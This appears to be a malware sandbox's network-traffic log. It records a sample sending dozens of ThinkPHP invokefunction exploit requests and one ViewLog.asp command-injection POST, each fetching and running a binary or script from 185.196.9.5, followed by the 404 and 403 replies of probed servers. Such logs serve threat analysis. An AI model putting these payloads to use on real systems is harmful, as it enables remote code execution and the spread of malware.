Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0

Source: unknown

DNS traffic detected: queries for: daisy.ubuntu.com

Source: unknown

HTTP traffic detected: POST /cgi-bin/ViewLog.asp HTTP/1.1Host: 185.196.9.5:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.20.0Content-Length: 227Content-Type: application/x-www-form-urlencodedData Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Frame-Options: sameoriginStrict-Transport-Security: max-age=31536000; includeSubdomainsContent-Length: 341Connection: closeDate: Sun, 25 Feb 2024 18:02:28 GMTServer: lighttpd/1.4.69Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Sun, 25 Feb 2024 18:02:29 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Feb 2024 20:02:28 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0X-NWS-LOG-UUID: 17775140683376170073Connection: closeServer: Lego ServerDate: Sun, 25 Feb 2024 18:02:31 GMTX-Cache-Lookup: Return Directly
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 25 Feb 2024 18:02:32 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundserver: owsdcontent-type: text/htmlcontent-length: 38
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: owsdcontent-type: text/htmlcontent-length: 38
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Sun, 25 Feb 2024 18:02:39 GMTX-Frame-Options: sameoriginContent-Security-Policy: frame-ancestors 'self'X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=block
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 25 Feb 2024 18:02:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Feb 2024 20:02:43 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Jan 1970 11:20:00 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 25 Feb 2024 18:02:54 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io;Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 25 Feb 2024 18:03:01 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
